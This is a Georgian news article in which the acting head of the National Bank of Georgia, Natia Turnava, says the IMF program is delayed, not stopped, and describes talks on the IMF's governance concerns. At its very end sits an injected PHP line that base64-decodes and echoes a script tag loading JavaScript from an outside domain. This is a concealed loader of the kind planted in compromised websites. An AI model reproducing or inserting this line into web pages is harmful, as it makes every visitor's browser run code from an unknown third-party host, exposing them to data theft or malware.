celsiusi
ავერსი საქკაბელი

საქართველოს ეროვნული ბანკის პრეზიდენტის მოვალეობის შემსრულებლის, ნათია თურნავას განმარტებით, ეროვნულ ბანკს სავალუტო ფონდთან კომუნიკაცია ჰქონდა ყველა იმ საკითხზე, რაზეც ორგანიზაცია წუხილს გამოთქვამდა.

თურნავას თქმით, საერთაშორისო სავალუტო ფონდის პროგრამა არ შეჩერებულა, არამედ დროებით გადაიდო მხოლოდ პროგრამის მეორე მიმოხილვის IMF-ის ბორდის სხდომაზე განხილვა.

„ჩვენ ვამბობდით, რომ ფონდის პროგრამა არ შეწყვეტილა, გადაიდო მისი მეორე მიმოხილვის განხილვა საერთაშორისო სავალუტო ფონდის საბჭოზე. დროებით შეფერხებად აღვიქვამთ ამას. ახლახან დავასრულეთ ე.წ ვირტუალური მისია, ვმუშაობთ ინტენსიურად. არა მხოლოდ ეროვნული ბანკი, არამედ მთავრობის ეკონომიკური გუნდი იყო ჩართული IMF-თან პროგრამის მიმდინარეობის სხვადასხვა ელემენტის განხილვაში. IMF-მა გამოაქვეყნა კიდეც ამასთან დაკავშირებით პრესრელიზი, ჰქონდა საჯარო კომუნიკაცია, იცით, რომ ძალიან დადებითად შეაფასა არა მხოლოდ ჩვენი და მთავრობის ძალისხმევა და მიმართება იმასთან დაკავშირებით, რომ პროგრამა დაჩქარდეს, კვლავინდებურად გეგმის მიხედვით გაგრძელდეს, არამედ, ზოგადად, ეკონომიკური ვითარება ქვეყანაში და ამ კუთხით გადადგმული ნაბიჯები როგორც მთავრობის მხრიდან ეკონომიკური პოლიტიკის სფეროში, ასევე ეროვნული ბანკის მხრიდან მონეტარული პოლიტიკის სფეროში. ეს აძლევს, პირველ რიგში, საფუძველს, ჩემი აზრით, სავალუტო ფონდს, რომ ძალიან ოპტიმისტურად იყოს ამ თვალსაზრისით. რაც შეეხება იმ წუხილს, რასაც IMF გამოთქვამდა ეროვნული ბანკის კანონმდებლობასთან მიმართებით, წუხილის მთავარი შინაარსი არის ის, რომ სამეთვალყურეო საბჭოში უნდა იყოს მყარი უმრავლესობა არააღმასრულებელი წევრების. მიაჩნიათ, რომ ასე უფრო ეფექტური იქნება ეროვნული ბანკის მართვა. აქედან გამომდინარე, გვქონდა ამ ყველაფერზე კომუნიკაცია. შევთანხმდით იმაზე, რომ შემოდგომაზე, სექტემბერში ან ოქტომბერში სავალუტო ფონდის ტექნიკური მისია იქნება მოვლენილი და მათ იურისტებთან ერთად და მთავრობასთან ერთად ვიმუშავებთ, რა წინადადებები შეიძლება შევიმუშაოთ და შევთავაზოთ. აქედან გამომდინარე, ეს საკითხიც გადაწყდება დადებითად. ოპტიმისტურად ვართ განწყობილი პროგრამასთან დაკავშირებით“, – განაცხადა ნათია თურნავამ.

467
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");